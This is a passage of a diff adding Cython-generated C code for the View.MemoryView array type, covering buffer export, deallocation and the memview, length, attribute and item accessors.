__pyx_t_3 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_3 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 177, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_v_self->dtype_is_object = __pyx_t_3; + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + if (__pyx_v_allocate_buffer) { + + /* "View.MemoryView":180 + * + * if allocate_buffer: + * _allocate_buffer(self) # <<<<<<<<<<<<<< + * + * @cname('getbuffer') + */ + __pyx_t_7 = __pyx_array_allocate_buffer(__pyx_v_self); if (unlikely(__pyx_t_7 == ((int)-1))) __PYX_ERR(1, 180, __pyx_L1_error) + + /* "View.MemoryView":179 + * self.dtype_is_object = format == b'O' + * + * if allocate_buffer: # <<<<<<<<<<<<<< + * _allocate_buffer(self) + * + */ + } + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_format); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + +/* Python wrapper */ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getbuffer__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(((struct __pyx_array_obj *)__pyx_v_self), ((Py_buffer *)__pyx_v_info), ((int)__pyx_v_flags)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags) { + int __pyx_v_bufmode; + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + char *__pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + Py_ssize_t *__pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + if (unlikely(__pyx_v_info == NULL)) { + PyErr_SetString(PyExc_BufferError, "PyObject_GetBuffer: view==NULL argument is obsolete"); + return -1; + } + __Pyx_RefNannySetupContext("__getbuffer__", 0); + __pyx_v_info->obj = Py_None; __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(__pyx_v_info->obj); + + /* "View.MemoryView":184 + * @cname('getbuffer') + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 # <<<<<<<<<<<<<< + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + */ + __pyx_v_bufmode = -1; + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_t_1 = ((__pyx_v_flags & ((PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS) | PyBUF_ANY_CONTIGUOUS)) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_c, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 186, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":187 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + __pyx_v_bufmode = (PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":186 + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): + * if self.mode == u"c": # <<<<<<<<<<<<<< + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + */ + goto __pyx_L4; + } + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + __pyx_t_1 = (__Pyx_PyUnicode_Equals(__pyx_v_self->mode, __pyx_n_u_fortran, Py_EQ)); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(1, 188, __pyx_L1_error) + if (__pyx_t_1) { + + /* "View.MemoryView":189 + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS # <<<<<<<<<<<<<< + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + */ + __pyx_v_bufmode = (PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS); + + /* "View.MemoryView":188 + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * elif self.mode == u"fortran": # <<<<<<<<<<<<<< + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + */ + } + __pyx_L4:; + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + __pyx_t_1 = (!((__pyx_v_flags & __pyx_v_bufmode) != 0)); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":191 + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." # <<<<<<<<<<<<<< + * info.buf = self.data + * info.len = self.len + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Can_only_create_a_buffer_that_is, 0, 0); + __PYX_ERR(1, 191, __pyx_L1_error) + + /* "View.MemoryView":190 + * elif self.mode == u"fortran": + * bufmode = PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + * if not (flags & bufmode): # <<<<<<<<<<<<<< + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + */ + } + + /* "View.MemoryView":185 + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + * if flags & (PyBUF_C_CONTIGUOUS | PyBUF_F_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS): # <<<<<<<<<<<<<< + * if self.mode == u"c": + * bufmode = PyBUF_C_CONTIGUOUS | PyBUF_ANY_CONTIGUOUS + */ + } + + /* "View.MemoryView":192 + * if not (flags & bufmode): + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data # <<<<<<<<<<<<<< + * info.len = self.len + * + */ + __pyx_t_2 = __pyx_v_self->data; + __pyx_v_info->buf = __pyx_t_2; + + /* "View.MemoryView":193 + * raise ValueError, "Can only create a buffer that is contiguous in memory." + * info.buf = self.data + * info.len = self.len # <<<<<<<<<<<<<< + * + * if flags & PyBUF_STRIDES: + */ + __pyx_t_3 = __pyx_v_self->len; + __pyx_v_info->len = __pyx_t_3; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + __pyx_t_1 = ((__pyx_v_flags & PyBUF_STRIDES) != 0); + if (__pyx_t_1) { + + /* "View.MemoryView":196 + * + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim # <<<<<<<<<<<<<< + * info.shape = self._shape + * info.strides = self._strides + */ + __pyx_t_4 = __pyx_v_self->ndim; + __pyx_v_info->ndim = __pyx_t_4; + + /* "View.MemoryView":197 + * if flags & PyBUF_STRIDES: + * info.ndim = self.ndim + * info.shape = self._shape # <<<<<<<<<<<<<< + * info.strides = self._strides + * else: + */ + __pyx_t_5 = __pyx_v_self->_shape; + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":198 + * info.ndim = self.ndim + * info.shape = self._shape + * info.strides = self._strides # <<<<<<<<<<<<<< + * else: + * info.ndim = 1 + */ + __pyx_t_5 = __pyx_v_self->_strides; + __pyx_v_info->strides = __pyx_t_5; + + /* "View.MemoryView":195 + * info.len = self.len + * + * if flags & PyBUF_STRIDES: # <<<<<<<<<<<<<< + * info.ndim = self.ndim + * info.shape = self._shape + */ + goto __pyx_L6; + } + + /* "View.MemoryView":200 + * info.strides = self._strides + * else: + * info.ndim = 1 # <<<<<<<<<<<<<< + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL + */ + /*else*/ { + __pyx_v_info->ndim = 1; + + /* "View.MemoryView":201 + * else: + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL # <<<<<<<<<<<<<< + * info.strides = NULL + * + */ + if (((__pyx_v_flags & PyBUF_ND) != 0)) { + __pyx_t_5 = (&__pyx_v_self->len); + } else { + __pyx_t_5 = NULL; + } + __pyx_v_info->shape = __pyx_t_5; + + /* "View.MemoryView":202 + * info.ndim = 1 + * info.shape = &self.len if flags & PyBUF_ND else NULL + * info.strides = NULL # <<<<<<<<<<<<<< + * + * info.suboffsets = NULL + */ + __pyx_v_info->strides = NULL; + } + __pyx_L6:; + + /* "View.MemoryView":204 + * info.strides = NULL + * + * info.suboffsets = NULL # <<<<<<<<<<<<<< + * info.itemsize = self.itemsize + * info.readonly = 0 + */ + __pyx_v_info->suboffsets = NULL; + + /* "View.MemoryView":205 + * + * info.suboffsets = NULL + * info.itemsize = self.itemsize # <<<<<<<<<<<<<< + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + */ + __pyx_t_3 = __pyx_v_self->itemsize; + __pyx_v_info->itemsize = __pyx_t_3; + + /* "View.MemoryView":206 + * info.suboffsets = NULL + * info.itemsize = self.itemsize + * info.readonly = 0 # <<<<<<<<<<<<<< + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self + */ + __pyx_v_info->readonly = 0; + + /* "View.MemoryView":207 + * info.itemsize = self.itemsize + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL # <<<<<<<<<<<<<< + * info.obj = self + * + */ + if (((__pyx_v_flags & PyBUF_FORMAT) != 0)) { + __pyx_t_2 = __pyx_v_self->format; + } else { + __pyx_t_2 = NULL; + } + __pyx_v_info->format = __pyx_t_2; + + /* "View.MemoryView":208 + * info.readonly = 0 + * info.format = self.format if flags & PyBUF_FORMAT else NULL + * info.obj = self # <<<<<<<<<<<<<< + * + * def __dealloc__(array self): + */ + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); + __pyx_v_info->obj = ((PyObject *)__pyx_v_self); + + /* "View.MemoryView":182 + * _allocate_buffer(self) + * + * @cname('getbuffer') # <<<<<<<<<<<<<< + * def __getbuffer__(self, Py_buffer *info, int flags): + * cdef int bufmode = -1 + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView.array.__getbuffer__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + if (__pyx_v_info->obj != NULL) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + goto __pyx_L2; + __pyx_L0:; + if (__pyx_v_info->obj == Py_None) { + __Pyx_GOTREF(__pyx_v_info->obj); + __Pyx_DECREF(__pyx_v_info->obj); __pyx_v_info->obj = 0; + } + __pyx_L2:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + +/* Python wrapper */ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_array___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + __pyx_t_1 = (__pyx_v_self->callback_free_data != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":212 + * def __dealloc__(array self): + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) # <<<<<<<<<<<<<< + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + */ + __pyx_v_self->callback_free_data(__pyx_v_self->data); + + /* "View.MemoryView":211 + * + * def __dealloc__(array self): + * if self.callback_free_data != NULL: # <<<<<<<<<<<<<< + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + if (__pyx_v_self->free_data) { + } else { + __pyx_t_1 = __pyx_v_self->free_data; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_self->data != NULL); + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + if (__pyx_v_self->dtype_is_object) { + + /* "View.MemoryView":215 + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) # <<<<<<<<<<<<<< + * free(self.data) + * PyObject_Free(self._shape) + */ + __pyx_memoryview_refcount_objects_in_slice(__pyx_v_self->data, __pyx_v_self->_shape, __pyx_v_self->_strides, __pyx_v_self->ndim, 0); + + /* "View.MemoryView":214 + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: + * if self.dtype_is_object: # <<<<<<<<<<<<<< + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + */ + } + + /* "View.MemoryView":216 + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) # <<<<<<<<<<<<<< + * PyObject_Free(self._shape) + * + */ + free(__pyx_v_self->data); + + /* "View.MemoryView":213 + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + * elif self.free_data and self.data is not NULL: # <<<<<<<<<<<<<< + * if self.dtype_is_object: + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + */ + } + __pyx_L3:; + + /* "View.MemoryView":217 + * refcount_objects_in_slice(self.data, self._shape, self._strides, self.ndim, inc=False) + * free(self.data) + * PyObject_Free(self._shape) # <<<<<<<<<<<<<< + * + * @property + */ + PyObject_Free(__pyx_v_self->_shape); + + /* "View.MemoryView":210 + * info.obj = self + * + * def __dealloc__(array self): # <<<<<<<<<<<<<< + * if self.callback_free_data != NULL: + * self.callback_free_data(self.data) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_5array_7memview_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_5array_7memview___get__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":221 + * @property + * def memview(self): + * return self.get_memview() # <<<<<<<<<<<<<< + * + * @cname('get_memview') + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((struct __pyx_vtabstruct_array *)__pyx_v_self->__pyx_vtab)->get_memview(__pyx_v_self); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 221, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":219 + * PyObject_Free(self._shape) + * + * @property # <<<<<<<<<<<<<< + * def memview(self): + * return self.get_memview() + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.array.memview.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *__pyx_v_self) { + int __pyx_v_flags; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_memview", 0); + + /* "View.MemoryView":225 + * @cname('get_memview') + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE # <<<<<<<<<<<<<< + * return memoryview(self, flags, self.dtype_is_object) + * + */ + __pyx_v_flags = ((PyBUF_ANY_CONTIGUOUS | PyBUF_FORMAT) | PyBUF_WRITABLE); + + /* "View.MemoryView":226 + * cdef get_memview(self): + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_flags); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_self->dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF((PyObject *)__pyx_v_self); + __Pyx_GIVEREF((PyObject *)__pyx_v_self); + PyTuple_SET_ITEM(__pyx_t_3, 0, ((PyObject *)__pyx_v_self)); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_1 = 0; + __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_memoryview_type), __pyx_t_3, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 226, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":224 + * + * @cname('get_memview') + * cdef get_memview(self): # <<<<<<<<<<<<<< + * flags = PyBUF_ANY_CONTIGUOUS|PyBUF_FORMAT|PyBUF_WRITABLE + * return memoryview(self, flags, self.dtype_is_object) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.array.get_memview", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_array___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(((struct __pyx_array_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":229 + * + * def __len__(self): + * return self._shape[0] # <<<<<<<<<<<<<< + * + * def __getattr__(self, attr): + */ + __pyx_r = (__pyx_v_self->_shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":228 + * return memoryview(self, flags, self.dtype_is_object) + * + * def __len__(self): # <<<<<<<<<<<<<< + * return self._shape[0] + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr); /*proto*/ +static PyObject *__pyx_array___getattr__(PyObject *__pyx_v_self, PyObject *__pyx_v_attr) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getattr__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_attr)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getattr__", 0); + + /* "View.MemoryView":232 + * + * def __getattr__(self, attr): + * return getattr(self.memview, attr) # <<<<<<<<<<<<<< + * + * def __getitem__(self, item): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_memview); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_GetAttr(__pyx_t_1, __pyx_v_attr); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 232, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":231 + * return self._shape[0] + * + * def __getattr__(self, attr): # <<<<<<<<<<<<<< + * return getattr(self.memview, attr) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView.array.__getattr__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":234 + * return getattr(self.memview, attr) + * + * def __getitem__(self, item): # <<<<<<<<<<<<<< + * return self.memview[item] + * + */ + +/* Python wrapper */ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item); /*proto*/ +static PyObject *__pyx_array___getitem__(PyObject *__pyx_v_self, PyObject *__pyx_v_item) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__getitem__ (wrapper)", 0); + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(((struct __pyx_array_obj *)__pyx_v_self), ((PyObject *)__pyx_v_item)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__getitem__", 0); + + /* "View.MemoryView":235 + * + * def __getitem__(self, item): + * return self.memview[item] # <<<<<<<<<<<<<< + * + * def __setitem__(self, item, value): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), 